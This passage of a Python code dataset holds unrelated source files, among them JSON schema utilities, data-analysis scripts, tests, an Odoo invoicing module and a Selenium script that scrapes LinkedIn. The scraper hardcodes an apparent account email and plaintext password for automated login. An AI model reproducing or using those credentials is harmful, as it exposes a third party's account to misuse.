Street\")\n\n\nif __name__ == '__main__':\n    unittest.main()","sub_path":"DB_connection_app_tests.py","file_name":"DB_connection_app_tests.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"58430628","text":"import typing as t\nimport warnings\n\nNoneType = None.__class__\n\nT = t.TypeVar('T')\n\n\nclass AutoJsonMeta(type):\n    def __new__(mcs, name, bases, ns: dict):\n        if ns.get('_root', False):\n            return super().__new__(mcs, name, bases, ns)\n        bases = tuple(filter(lambda it: AutoJson is not it, bases))\n\n        ret = type(name, (*bases, Json), ns)\n        SchemaMonitor.register(ret)\n\n        annotations = ns.get('__annotations__', [])\n\n        def __init__(self, **kwargs):\n            if not kwargs:\n                return\n            for each in annotations:\n\n                setattr(self, each, kwargs[each])\n\n        template_format = f'{ret.__name__}({{}})'.format\n\n        def __repr__(self):\n            return template_format(', '.join(\n                f'{each}={getattr(self, each)!r}' for each in annotations))\n\n        ret.__init__ = __init__\n        ret.__repr__ = __repr__\n        return ret\n\n\nclass Json:\n    pass\n\n\nclass AutoJson(metaclass=AutoJsonMeta):\n    _root = True\n\n    def __init__(self, *args, **kwargs):\n        raise TypeError\n\n    def to_dict(self) -> dict:\n        raise TypeError\n\n    def to_bson(self) -> bytes:\n        raise TypeError\n\n    def to_json(self) -> bytes:\n        raise TypeError\n\n    @classmethod\n    def from_dict(cls: t.Type[T], data: dict) -> T:\n        raise TypeError\n\n\nclass Spec:\n    pass\n\n\nclass Named(Spec, t.NamedTuple):\n    typ: type\n\n\nclass ForwardRef(Spec, t.NamedTuple):\n    \"\"\"\n    to resolve cross references\n    class S:\n        a: A\n        s: S\n    \n    class A:\n        i: int\n    \"\"\"\n    name: str\n\n\nclass Concrete(Spec, t.NamedTuple):\n    \"\"\"\n    str, int, float, null\n    \"\"\"\n    typ: type\n\n\nNoneConcrete = Concrete(NoneType)\n\n\nclass Optional(Spec, t.NamedTuple):\n    typ: Spec\n\n\nclass Union(Spec, t.NamedTuple):\n    args: t.List[Spec]\n\n\nclass List(Spec, t.NamedTuple):\n    elem: Spec\n\n\nclass Dict(Spec, t.NamedTuple):\n    key: Spec\n    value: Spec\n\n\nclass SchemaMonitor:\n    # schemas: qualname -> (type, [(field_name, field_type_spec)])\n    schemas: t.Dict[str, t.Tuple[type, t.List[t.Tuple[str, Spec]]]] = {}\n    # methods: qualname -> (from_dict, to_dict, query)\n    methods: t.Dict[str, t.List[t.Callable]]\n\n    def __init__(self):\n        raise TypeError(\"Monitor is a singleton.\")\n\n    @classmethod\n    def remove(cls, typ: t.Union[str, type]):\n\n        subscript = typ\n        if isinstance(subscript, type):\n            subscript = subscript.__qualname__\n\n        del cls.schemas[subscript]\n\n    @classmethod\n    def register(cls, typ: type):\n        \"\"\"\n        :param typ: must be checked to contains __annotations__\n        :return:\n        \"\"\"\n        qualname = typ.__qualname__\n        if qualname in cls.schemas:\n            warnings.warn(f\"Overwriting json type schema {qualname!r}.\")\n\n        cls.schemas[typ.__qualname__] = typ, [\n            (k, describe(t)) for k, t in typ.__annotations__.items()\n        ]\n\n    @classmethod\n    def resolve(cls, strict=False):\n        for _, (ty, fields) in cls.schemas.items():\n            for i in range(len(fields)):\n                attr, field = fields[i]\n                fields[i] = attr, backref(field, strict=strict)\n\n\ndef backref(spec: Spec, strict) -> Spec:\n    def _backref(_):\n        return backref(_, strict)\n\n    if isinstance(spec, (Optional, Concrete, Named)):\n        return spec\n\n    if isinstance(spec, ForwardRef):\n        type_and_fields = SchemaMonitor.schemas.get(spec.name)\n        if type_and_fields:\n            return Named(type_and_fields[0])\n        if not strict:\n            return spec\n        raise TypeError(f'forward ref: {spec}.')\n\n    if isinstance(spec, List):\n        return List(_backref(spec.elem))\n\n    if isinstance(spec, Dict):\n        key = _backref(spec.key)\n        value = _backref(spec.value)\n        return Dict(key, value)\n\n    if isinstance(spec, Union):\n\n        return Union(list(map(_backref, spec.args)))\n\n    raise TypeError(spec)\n\n\ndef describe(ty: t.Union[str, t.Type]) -> Spec:\n    if isinstance(ty, str):\n        return ForwardRef(ty)\n\n    if ty in (int, float, str, NoneType):\n        return Concrete(ty)\n\n    if hasattr(ty, '__origin__'):\n        args: list = []\n\n        def is_origin(typ):\n            return ty.__origin__ is typ and (args.extend(\n                getattr(ty, '__args__')) or True)\n\n        if is_origin(t.List):\n            e_ty, = args\n            return List(describe(e_ty))\n        elif is_origin(t.Union):\n            args = list(map(describe, args))\n\n            if len(args) is 2 and NoneConcrete in args:\n                e_ty = args[args[0] == NoneConcrete]\n                return Optional(e_ty)\n            return Union(args)\n        elif is_origin(t.Dict):\n            key, value = map(describe, args)\n            return Dict(key, value)\n    if hasattr(ty, '__forward_arg__'):\n        return describe(getattr(ty, '__forward_arg__'))\n\n    assert issubclass(\n        ty, Json), TypeError(f\"expected Json type, got {ty.__qualname__!r}.\")\n\n    return Named(ty)\n","sub_path":"auto_json/schema_analyse.py","file_name":"schema_analyse.py","file_ext":"py","file_size_in_byte":4986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"3851434","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n#\n# Copyright 2007 TUBITAK/UEKAE\n# Licensed under the GNU General Public License, version 2.\n# See the file http://www.gnu.org/copyleft/gpl.txt.\n\nfrom pisi.actionsapi import pisitools\nfrom pisi.actionsapi import shelltools\nfrom pisi.actionsapi import get\n\n\ndefinitions = \"CFLAGS= \\\n               STD_INCLUDE=%s/usr/share/yodl \\\n               MAN_DIR=%s/usr/share/man \\\n               DOC_DIR=%s/usr/share/doc/yodl-%s-%s \\\n               YODL_BIN=%s/usr/bin \\\n               STD_CONVERSIONS=man\" % (get.installDIR(),get.installDIR(),get.installDIR(),get.srcVERSION(),get.srcRELEASE(),get.installDIR())\n\ndef setup():\n    pisitools.chmod(\"contrib/build.pl\")\n\ndef build():\n    shelltools.system(\"%s contrib/build.pl make\" % definitions)\n\ndef install():\n    shelltools.system(\"%s contrib/build.pl install\" % definitions)\n\n","sub_path":"pardus/tags/2007-EOL/applications/doc/yodl/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"108620323","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Dec  6 13:55:33 2020\n\n@author: Freedom\n\"\"\"\nimport numpy as np \nimport matplotlib.pyplot as plt\n\nvreme_simulacije = 302400 # duzina test seta ( 6 meseci )\nvremena_otkaza = np.load('vremena_otkaza.npy')\nvremena_popravke = np.load('vremena_popravke.npy')\npodatci1 = vremena_otkaza.reshape(-1)\npodatci2 = vremena_popravke.reshape(-1)\n\ndef gen_lambda_and_mi(podatci1,podatci2, seq_len, t):\n    matrix = np.zeros(vreme_simulacije)\n    for i in podatci1:\n        matrix[int(i)] = 1        \n    matrix1 = np.zeros(vreme_simulacije)\n    for i in podatci2:\n        matrix1[int(i)] = 1  \n    lambd = []\n    mi = []    \n    start = 0\n    end = seq_len\n    for i in range(int((len(matrix)-seq_len)/t)):\n        ls = matrix[start:end]\n        lambd.append(sum(ls))\n        ls1 = matrix1[start:end]\n        mi.append(sum(ls1))\n        start += t\n        end += t\n    lambd.append(sum(matrix[-seq_len:]))\n    mi.append(sum(matrix1[-seq_len:]))\n    return lambd, mi\n        \nseq_leng = [15*24*60, 7*24*60, 30*24*60]\ndt = [10, 30, 60]\n\nfor seq_len in seq_leng:\n    for t in dt:\n        lamb, mi =  gen_lambda_and_mi(podatci1,podatci2, int(seq_len), t)\n        mi_gen_simulacija = np.array(mi).reshape(-1, 1)\n        lamb_gen_simulacija = np.array(lamb).reshape(-1, 1)\n        sim_name_lam = 'Failure_rates_' + str(t) + 'dt_' + str(seq_len) + 'min_simulacija' + '.npy'\n        sim_name_mi = 'Repair_rates' + str(t) + 'dt' + str(seq_len) + 'min_simulacija' + '.npy'\n        np.save(sim_name_lam, lamb_gen_simulacija)\n        np.save(sim_name_mi +str(t), mi_gen_simulacija)\n        plt.plot(mi)","sub_path":"Machine_learning_simulations/1. Deterministic based prediction/Simulation_implementation/NN_classified/tf_normal_prediction_2y/tf_noram_prediction.py","file_name":"tf_noram_prediction.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"363521357","text":"\"\"\"\nThis file is part of pyS5p\n\nhttps://github.com/rmvanhees/pys5p.git\n\nPurpose\n-------\nPerform unittest on ICMio\n\nNote\n----\nPlease use the code as tutorial\n\nCopyright (c) 2017 SRON - Netherlands Institute for Space Research\n   All Rights Reserved\n\nLicense:  BSD-3-Clause\n\"\"\"\nimport sys\nimport re\n\nfrom pathlib import Path\n\ndef test_rd_icm(msm_dset=None):\n    \"\"\"\n    Perform a full read-test a ICM product using the ICMio class\n\n    \"\"\"\n    from ..get_data_dir import get_data_dir\n    from ..icm_io import ICMio\n\n    # obtain path to directory pys5p-data\n    try:\n        data_dir = get_data_dir()\n    except FileNotFoundError:\n        return\n    filelist = list(Path(data_dir, 'ICM').glob('S5P_TEST_ICM_CA_*.h5'))\n    if not filelist:\n        return\n\n    for name in sorted(filelist):\n        print(name, file=sys.stderr)\n        icm = ICMio(name)\n        print(icm)\n        print('version: ', icm.get_processor_version())\n        print('creation_time', icm.get_creation_time())\n        print('coverage_time', icm.get_coverage_time())\n        for key1 in icm.fid:\n            if not key1.startswith('BAND'):\n                continue\n            print(key1)\n            for key2 in icm.fid[key1]:\n                print('-->', key2)\n                icm.select(key2)\n                _ = icm.get_ref_time()\n                res2 = icm.get_delta_time()\n                print('\\t delta time: ', res2.shape)\n                res3 = icm.get_instrument_settings()\n                print('\\t instrument settings [{}]: '.format(res3.size),\n                      res3.shape)\n                res4 = icm.get_housekeeping_data()\n                print('\\t housekeeping data [{}]: '.format(res4.size),\n                      res4.shape)\n\n                if msm_dset is None:\n                    if key1.endswith('_RADIANCE'):\n                        geo = icm.get_geo_data(band=icm.bands[0],\n                                               geo_dset='latitude,longitude')\n                        print('\\t geodata: ', geo.shape)\n                        dset_name = 'radiance_avg'\n                    elif key1.endswith('_IRRADIANCE'):\n                        geo = icm.get_geo_data(band=icm.bands[0])\n                        print('\\t geodata: ', geo.shape)\n                        dset_name = 'irradiance_avg'\n                    elif key1.endswith('_ANALYSIS'):\n                        if key2 == 'ANALOG_OFFSET_SWIR':\n                            dset_name = 'analog_offset_swir_value'\n                        elif key2 == 'DPQF_MAP':\n                            dset_name = 'dpqf_map'\n                        elif key2 == 'LONG_TERM_SWIR':\n                            dset_name = 'long_term_swir_value'\n                        elif key2 == 'NOISE':\n                            dset_name = 'noise'\n                        else:\n                            dset_name = 'signal_avg'\n                    else:\n                        geo = icm.get_geo_data(band=icm.bands[0])\n                        print('\\t geodata: ', geo.shape)\n                        dset_name = 'signal_avg_row'\n                else:\n                    dset_name = msm_dset\n\n                # read both bands seperated\n                for ib in icm.bands:\n                    data = icm.get_msm_data(dset_name, band=ib)\n                    print('\\t {}[{}]: {}'.format(dset_name, ib,\n                                                 data.shape))\n\n                # read whole channels\n                for ib in re.findall('..', icm.bands):\n                    data = icm.get_msm_data(dset_name, band=ib)\n                    print('\\t {}[{}]: {}'.format(dset_name, ib,\n                                                 data.shape))\n\n        icm.close()\n\nif __name__ == '__main__':\n    test_rd_icm()\n","sub_path":"pys5p/full_tests/test_full_icm.py","file_name":"test_full_icm.py","file_ext":"py","file_size_in_byte":3750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"533669306","text":"from unittest import TestCase\n\n\nclass T(TestCase):\n    def test(self):\n        from ..name import Literal, Name\n        from ..lexer import lex,\\\n            APPEND, BRA, COLON, KET, RECURSIVE, SIMPLE\n        Name._clear()  # pylint: disable=protected-access\n        feed = r'''\n            # 0\n            +a ::==+=(*b # x\n                # y\n                -c:\n                # z\n                (/d)\n            )e\n        '''\n        a, b, c, d = map(Name, (r'+a', r'*b', r'-c', r'/d'))\n        e = Literal(r'e')\n        ex = a, COLON, SIMPLE, RECURSIVE, APPEND,\\\n            BRA, b, c, COLON, BRA, d, KET, KET, e\n        le = len(ex)\n        ac = tuple(lex(feed))\n        assert len(ac) == le\n        expected = (True,) * (le - 1) + (False,)\n        actual = tuple(self.same_side_by_side(ex, ac))\n        self.assertEqual(expected, actual)\n\n    @staticmethod\n    def same_side_by_side(ex, ac):\n        return (e is a for e, a in zip(ex, ac))\n","sub_path":"a0attic/a2017_11_21b_ez_lexer_with_name/test/tokenize.py","file_name":"tokenize.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"614540324","text":"# ---------------------------------------------------------------------------------------------------------------------\r\n# Import Statements\r\n\r\nimport os\r\nimport cv2\r\nimport numpy as np\r\nimport imutils\r\nimport math\r\nimport scipy.stats as stats\r\nfrom scipy.integrate import quad\r\nfrom matplotlib import pyplot\r\nfrom sklearn import metrics\r\n\r\n# ---------------------------------------------------------------------------------------------------------------------\r\n# Obtains Number of Images in Directory\r\n\r\nimg_folder_pathF = \"C:/Users/david/OneDrive/Documents/PycharmProjects/Primary/Raw Data/ML_specgra_10m20_echo_norm\" \\\r\n                   \"_and_timedelay_remove_04082019/training_set/foliage\"\r\nfileNumberF = os.listdir(img_folder_pathF)\r\n\r\nimg_folder_pathH = \"C:/Users/david/OneDrive/Documents/PycharmProjects/Primary/Raw Data/ML_specgra_10m20_echo_norm\" \\\r\n                   \"_and_timedelay_remove_04082019/training_set/hole\"\r\nfileNumberH = os.listdir(img_folder_pathH)\r\n\r\n# ---------------------------------------------------------------------------------------------------------------------\r\n# Variable Initializations\r\n\r\nallMeanValuesF = np.array([])\r\nallMeanValuesH = np.array([])\r\n# distance to mean sum\r\ndtmsF = 0\r\ndtmsH = 0\r\nthresholdF = 0\r\nthresholdH = 0\r\nareaHIT = [None] * 100\r\nareaFA = [None] * 100\r\nnumImagesF = len(fileNumberF)\r\nnumImagesH = len(fileNumberH)\r\n\r\n# ---------------------------------------------------------------------------------------------------------------------\r\n# Mean and Standard Deviation Calculations for Foliage\r\n\r\n# FOLIAGE\r\nfor i in range(1, numImagesF + 1):\r\n    path = img_folder_pathF + \"/foliage.\" + str(i) + \".0.jpg\"\r\n\r\n    img = cv2.imread(path, 2)\r\n    rotateimg = imutils.rotate(img, 60)\r\n    newimg = cv2.resize(rotateimg, (64, 64))\r\n    newimg = cv2.normalize(newimg.astype('float'), None, 0.0, 1.0, cv2.NORM_MINMAX)\r\n\r\n    foliagePixelValues = np.array([])\r\n\r\n    for r in range(64):\r\n        for j in range(10, 20):\r\n            pixelValue = newimg[r, j]\r\n            foliagePixelValues = np.append(foliagePixelValues, pixelValue)\r\n\r\n    sortedFPV = sorted(foliagePixelValues)\r\n\r\n    tophalfFPV = sortedFPV[len(sortedFPV) // 2:]  # cuts pixel values in half, to get top 50%\r\n    topquarterFPV = tophalfFPV[len(tophalfFPV) // 2:]  # cuts pixel values in half again, to get top 25%\r\n\r\n    # takes mean of pixel value array and then adds it to another empty array\r\n    meanPixelValueImageF = sum(topquarterFPV) / len(topquarterFPV)\r\n\r\n    allMeanValuesF = np.append(allMeanValuesF, meanPixelValueImageF)\r\n    print(\"Foliage Image #: \" + str(i) + \"/\" + str(numImagesF))\r\n\r\n# calculates mean/std for FOLIAGE\r\nmeanFoliage = sum(allMeanValuesF) / len(allMeanValuesF)\r\n\r\nfor i in range(len(allMeanValuesF)):\r\n    dtmsF = dtmsF + (allMeanValuesF[i] - meanFoliage) ** 2\r\n\r\nstdFoliage = math.sqrt(dtmsF / len(allMeanValuesF))\r\n\r\n# ---------------------------------------------------------------------------------------------------------------------\r\n# Mean and Standard Deviation Calculations for Hole\r\n\r\n# HOLE\r\nfor i in range(1, numImagesH + 1):\r\n    path = img_folder_pathH + \"/hole.\" + str(i) + \".0.jpg\"\r\n\r\n    img = cv2.imread(path, 2)\r\n    rotateimg = imutils.rotate(img, 60)\r\n    newimg = cv2.resize(rotateimg, (64, 64))\r\n    newimg = cv2.normalize(newimg.astype('float'), None, 0.0, 1.0, cv2.NORM_MINMAX)\r\n\r\n    holePixelValues = np.array([])\r\n\r\n    for r in range(64):\r\n        for j in range(10, 20):\r\n            pixelValue = newimg[r, j]\r\n            holePixelValues = np.append(holePixelValues, pixelValue)\r\n\r\n    sortedHPV = sorted(holePixelValues)\r\n\r\n    tophalfHPV = sortedHPV[len(sortedHPV) // 2:]\r\n    topquarterHPV = tophalfHPV[len(tophalfHPV) // 2:]\r\n\r\n    meanPixelValueImageH = sum(topquarterHPV) / len(topquarterHPV)\r\n\r\n    allMeanValuesH = np.append(allMeanValuesH, meanPixelValueImageH)\r\n    print(\"Hole Image #: \" + str(i) + \"/\" + str(numImagesH))\r\n\r\n# calculates mean/std for FOLIAGE\r\nmeanHole = sum(allMeanValuesH) / len(allMeanValuesH)\r\n\r\nfor i in range(len(allMeanValuesH)):\r\n    dtmsH = dtmsH + (allMeanValuesH[i] - meanHole) ** 2\r\n\r\nstdHole = math.sqrt(dtmsH / len(allMeanValuesH))\r\n\r\n# ---------------------------------------------------------------------------------------------------------------------\r\n# Various Information on Foliage/Hole\r\n\r\nprint('--------------------------------------')\r\nprint('FOLIAGE')\r\nprint('Min Mean of Foliage: ' + str(round(min(allMeanValuesF), 2)))\r\nprint('Max Mean of Foliage: ' + str(round(max(allMeanValuesF), 2)))\r\nprint('The Mean of Foliage: ' + str(round(meanFoliage, 2)))\r\nprint('The STD of Foliage: ' + str(round(stdFoliage, 2)))\r\nprint('--------------------------------------')\r\nprint('HOLE')\r\nprint('Min Mean of Hole: ' + str(round(min(allMeanValuesH), 2)))\r\nprint('Max Mean of Hole: ' + str(round(max(allMeanValuesH), 2)))\r\nprint('The Mean of Hole: ' + str(round(meanHole, 2)))\r\nprint('The STD of Hole: ' + str(round(stdHole, 2)))\r\nprint('--------------------------------------')\r\n\r\n# ---------------------------------------------------------------------------------------------------------------------\r\n# Normal Distribution Curve Plotting\r\n\r\nlowerBound = 0\r\nupperBound = 1\r\n\r\nx = np.linspace(lowerBound, upperBound, 10000)\r\nfoliagePlot = pyplot.plot(x, stats.norm.pdf(x, meanFoliage, stdFoliage), color='blue')\r\nholePlot = pyplot.plot(x, stats.norm.pdf(x, meanHole, stdHole), color='red')\r\npyplot.grid()\r\npyplot.show()\r\n\r\n\r\n# ---------------------------------------------------------------------------------------------------------------------\r\n# Integration of Hits\r\n\r\n\r\ndef ndffoliage(x):\r\n    value = stats.norm.pdf(x, meanFoliage, stdFoliage)\r\n    return value\r\n\r\n\r\nfor i in range(0, 100):\r\n    af = 0 + thresholdF\r\n    bf = 1\r\n\r\n    res, err = quad(ndffoliage, af, bf)\r\n\r\n    areaHIT[i] = round(res, 4)\r\n    thresholdF = thresholdF + 0.01\r\n\r\n    # print('Integration between {} and {} --> '.format(af, bf), round(res, 4))\r\n    #\r\n    # ptx = np.linspace(af, bf, 10)\r\n    # pty = stats.norm.pdf(ptx, meanFoliage, stdFoliage)\r\n    #\r\n    # pyplot.fill_between(ptx, pty, color='#0b5    areaHIT[i] = round(res, 4)59f', alpha='1.0')\r\n    # pyplot.show()\r\n\r\n\r\n# print(\"Area Hit: \" + str(areaHIT))\r\n\r\n# ---------------------------------------------------------------------------------------------------------------------\r\n# Integration of False Alarms\r\n\r\n\r\ndef ndfhole(x):\r\n    value = stats.norm.pdf(x, meanHole, stdHole)\r\n    return value\r\n\r\n\r\nfor i in range(0, 100):\r\n    ah = 0 + thresholdH\r\n    bh = 1\r\n\r\n    res, err = quad(ndfhole, ah, bh)\r\n\r\n    areaFA[i] = round(res, 4)\r\n    thresholdH = thresholdH + 0.01\r\n\r\n    # print('Integration between {} and {} --> '.format(ah, bh), round(res, 4))\r\n    #\r\n    # ptx = np.linspace(ah, bh, 10)\r\n    # pty = stats.norm.pdf(ptx, meanHole, stdHole)\r\n    #\r\n    # pyplot.fill_between(ptx, pty, color='#0b559f', alpha='1.0')\r\n    # pyplot.show()\r\n\r\n# print(\"Area FA: \" + str(areaFA))\r\n\r\n# ---------------------------------------------------------------------------------------------------------------------\r\n# Plots the ROC Curve\r\n\r\nhitROC = list(reversed(areaHIT))\r\nfaROC = list(reversed(areaFA))\r\n\r\npyplot.plot(faROC, hitROC, color='red')\r\n\r\npyplot.grid()\r\npyplot.xlim(0.0, 1.0)\r\npyplot.ylim(0.0, 1.0)\r\n\r\npyplot.title('ROC Foliage/Hole Data', fontsize=10)\r\npyplot.xlabel('False Alarms')\r\npyplot.ylabel('Hits')\r\npyplot.show()\r\n\r\n# ---------------------------------------------------------------------------------------------------------------------\r\n# Finds the AUROC\r\n\r\nAUROC = metrics.auc(hitROC, faROC)\r\nif AUROC > 0.5:\r\n    print('AUROC: ' + str(round(AUROC, 4)))\r\n    print('AUROC: ' + str(round(AUROC, 2)))\r\nelse:\r\n    print('AUROC: ' + str(round(1 - AUROC, 4)))\r\n    print('AUROC: ' + str(round(1 - AUROC, 2)))\r\n","sub_path":"spectrogram_analyzation.py","file_name":"spectrogram_analyzation.py","file_ext":"py","file_size_in_byte":7787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"306012749","text":"import requests\nimport csv\nimport bs4\nimport time\n# from compsim.company_name_similarity import CompanyNameSimilarity\nfrom selenium import webdriver\n\ndef linkedinLogin(driver):\n\n    URL = 'https://www.linkedin.com/uas/login'\n    driver.get('https://www.linkedin.com/uas/login')\n\n    emailid = driver.find_element_by_id(\"session_key-login\")\n    emailid.send_keys('sashadogskrpr0@gmail.com')\n    passwordid = driver.find_element_by_id(\"session_password-login\")\n    passwordid.send_keys('qywcon-sYmra4-jemwuw')\n    signin = driver.find_element_by_id(\"btn-primary\")\n    signin.click()\n\ndef linkedinBusiness(business,driver):\n    url = 'https://duckduckgo.com/?q=!ducky+' + business + ' linked-in'\n    driver.get(url)\n\n    time.sleep(5)\n\n    html = driver.page_source\n    soup = bs4.BeautifulSoup(html, \"html.parser\")\n    currentUrl = driver.current_url\n\n    try:\n        regName = soup.find(\"h1\", attrs={'dir':'ltr'}).getText().strip()\n    except Exception as e:\n        regName = str(e)\n\n    try:\n        follower = soup.find(\"span\", class_=\"org-top-card-module__followers-count \"\n                             \"org-top-card-module__dot-separated-list\").getText().strip()\n    except Exception as e:\n        follower = str(e)\n\n\n\n    return currentUrl, regName, follower\n    print(currentUrl)\n    print(regName)\n    print(follower)\n\n\ndef load_csv(business, driver):\n    searchResult = linkedinBusiness(business, driver)\n    print(searchResult)\n\n    if searchResult != None:\n        linkedInUrl = searchResult[0]\n        regName = searchResult[1]\n        follower = searchResult[2]\n\n        return linkedInUrl, regName, follower\n\nif __name__=='__main__':\n\n    ##initiate driver\n    chrome_options = webdriver.ChromeOptions()\n    chrome_options.add_argument('--disable-extensions')\n    chrome_options.add_argument('--profile-directory=Default')\n    chrome_options.add_argument(\"--incognito\")\n    chrome_options.add_argument(\"--disable-plugins-discovery\")\n    chrome_options.add_argument(\"--start-maximized\")\n    driver = webdriver.Chrome(chrome_options=chrome_options)\n    driver.delete_all_cookies()\n    driver.set_window_size(800, 800)\n    driver.set_window_position(0, 0)\n\n\n    linkedinLogin(driver)\n    result = load_csv('Marvin Engineering',driver)\n    print(result)\n    print(\"URL: \" +result[0])\n    print(\"address: \" +result[1])\n","sub_path":"LinkedIn.py","file_name":"LinkedIn.py","file_ext":"py","file_size_in_byte":2328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"58082462","text":"\n# -*- coding: utf-8 -*-\nfrom odoo import models, fields, api\nfrom odoo.tools.float_utils import float_compare\nimport datetime\nfrom math import * \n# from difodoo.addons_gesprim.difodoo_ventes.models.di_outils import di_recherche_prix_unitaire\n# from difodoo_ventes import di_outils\n# from difodoo.outils import di_outils\n\nclass AccountInvoice(models.Model):\n    _inherit = 'account.invoice'\n    \n    di_nbex = fields.Integer(\"Nombre exemplaires\",help=\"\"\"Nombre d'exemplaires d'une impression.\"\"\",default=0)\n    \n    @api.model\n    def create(self,vals):        \n        res = super(AccountInvoice, self).create(vals)        \n        for invoice in res:   \n            if invoice.di_nbex==0: \n                if invoice.partner_id:                \n                    invoice.write({'di_nbex': invoice.partner_id.di_nbex_fac})                \n        return res\n    \n    @api.multi\n    @api.onchange(\"partner_id\")\n    def di_onchange_partner(self):\n        for fac in self:\n            if fac.partner_id:\n                fac.di_nbex = fac.partner_id.di_nbex_fac\n    \n    @api.multi\n    def _invoice_line_tax_values(self):\n        # copie standard\n        self.ensure_one()\n        tax_datas = {}\n        TAX = self.env['account.tax']\n\n        for line in self.mapped('invoice_line_ids'):\n            # modif de la quantité à prendre en compte\n            di_qte_prix = 0.0\n           \n            if line.di_un_prix == \"PIECE\":\n                di_qte_prix = line.di_nb_pieces\n            elif line.di_un_prix == \"COLIS\":\n                di_qte_prix = line.di_nb_colis\n            elif line.di_un_prix == \"PALETTE\":\n                di_qte_prix = line.di_nb_palette\n            elif line.di_un_prix == \"KG\":\n                di_qte_prix = line.di_poin\n            elif line.di_un_prix == False or line.di_un_prix == '':\n                di_qte_prix = line.quantity\n                \n            price_unit = line.price_unit * (1 - (line.discount or 0.0) / 100.0)\n            tax_lines = line.invoice_line_tax_ids.compute_all(price_unit, line.invoice_id.currency_id, di_qte_prix, line.product_id, line.invoice_id.partner_id)['taxes']\n            for tax_line in tax_lines:\n                tax_line['tag_ids'] = TAX.browse(tax_line['id']).tag_ids.ids\n            tax_datas[line.id] = tax_lines\n        return tax_datas\n   \n    \n    @api.multi\n    def get_taxes_values(self):  \n        # copie standard          \n        tax_grouped = {}\n        for line in self.invoice_line_ids:\n            if not line.account_id:\n                continue\n            # modif de la quantité à prendre en compte\n            di_qte_prix = 0.0\n           \n            if line.di_un_prix == \"PIECE\":\n                di_qte_prix = line.di_nb_pieces\n            elif line.di_un_prix == \"COLIS\":\n                di_qte_prix = line.di_nb_colis\n            elif line.di_un_prix == \"PALETTE\":\n                di_qte_prix = line.di_nb_palette\n            elif line.di_un_prix == \"KG\":\n                di_qte_prix = line.di_poin\n            elif line.di_un_prix == False or line.di_un_prix == '':\n                di_qte_prix = line.quantity\n                                \n            price_unit = line.price_unit * (1 - (line.discount or 0.0) / 100.0)\n#             taxes = line.invoice_line_tax_ids.compute_all(price_unit, self.currency_id, line.quantity, line.product_id, self.partner_id)['taxes']\n            taxes = line.invoice_line_tax_ids.compute_all(price_unit, self.currency_id, di_qte_prix, line.product_id, self.partner_id)['taxes']\n            for tax in taxes:\n                val = self._prepare_tax_line_vals(line, tax)\n                key = self.env['account.tax'].browse(tax['id']).get_grouping_key(val)\n\n                if key not in tax_grouped:\n                    tax_grouped[key] = val\n                else:\n                    tax_grouped[key]['amount'] += val['amount']\n                    tax_grouped[key]['base'] += val['base']\n        return tax_grouped\n    \n    \n    def _prepare_invoice_line_from_po_line(self, line):\n        # copie standard\n        #Copie du standard pour ajouter des éléments dans data\n        if line.product_id.purchase_method == 'purchase':\n            qty = line.product_qty - line.qty_invoiced\n            di_qte_un_saisie = line.di_qte_un_saisie - line.di_qte_un_saisie_fac\n            di_poib = line.di_poib - line.di_poib_fac            \n        #ajout difodoo\n        else:\n            qty = line.qty_received - line.qty_invoiced\n            di_qte_un_saisie = line.di_qte_un_saisie_liv - line.di_qte_un_saisie_fac\n            di_poib = line.di_poib_liv - line.di_poib_fac\n        #ajout difodoo\n        if float_compare(qty, 0.0, precision_rounding=line.product_uom.rounding) <= 0:\n            qty = 0.0\n        taxes = line.taxes_id\n        invoice_line_tax_ids = line.order_id.fiscal_position_id.map_tax(taxes)\n        invoice_line = self.env['account.invoice.line']\n        data = {\n            'purchase_line_id': line.id,\n            'name': line.order_id.name+': '+line.name,\n            'origin': line.order_id.origin,\n            'uom_id': line.product_uom.id,\n            'product_id': line.product_id.id,\n            'account_id': invoice_line.with_context({'journal_id': self.journal_id.id, 'type': 'in_invoice'})._default_account(),\n            'price_unit': line.order_id.currency_id.with_context(date=self.date_invoice).compute(line.price_unit, self.currency_id, round=False),\n            'quantity': qty,\n            'discount': 0.0,\n            'account_analytic_id': line.account_analytic_id.id,\n            'analytic_tag_ids': line.analytic_tag_ids.ids,\n            'invoice_line_tax_ids': invoice_line_tax_ids.ids,\n            #Ajout des éléments difodoo\n            'di_tare':line.di_tare,  \n            'di_un_saisie':line.di_un_saisie,\n            'di_type_palette_id':line.di_type_palette_id,\n            'di_product_packaging_id':line.product_packaging,\n            'di_un_prix':line.di_un_prix,\n            'di_qte_un_saisie':di_qte_un_saisie,\n            'di_poib':di_poib\n                               \n        }\n        account = invoice_line.get_invoice_line_account('in_invoice', line.product_id, line.order_id.fiscal_position_id, self.env.user.company_id)\n        if account:\n            data['account_id'] = account.id\n        return data\n     \nclass AccountInvoiceLine(models.Model):\n    _inherit = \"account.invoice.line\"\n    \n    modifparprg = False\n     \n    di_qte_un_saisie = fields.Float(string='Quantité en unité de saisie', store=True)\n    di_un_saisie = fields.Selection([(\"PIECE\", \"Pièce\"), (\"COLIS\", \"Colis\"), (\"PALETTE\", \"Palette\"), (\"KG\", \"Kg\")], string=\"Unité de saisie\", store=True)\n    di_type_palette_id = fields.Many2one('product.packaging', string='Palette', store=True) \n    di_nb_pieces = fields.Integer(string='Nb pièces', compute=\"_compute_qte_aff\", store=True)\n    di_nb_colis = fields.Integer(string='Nb colis' ,compute=\"_compute_qte_aff\", store=True)\n    di_nb_palette = fields.Float(string='Nb palettes' 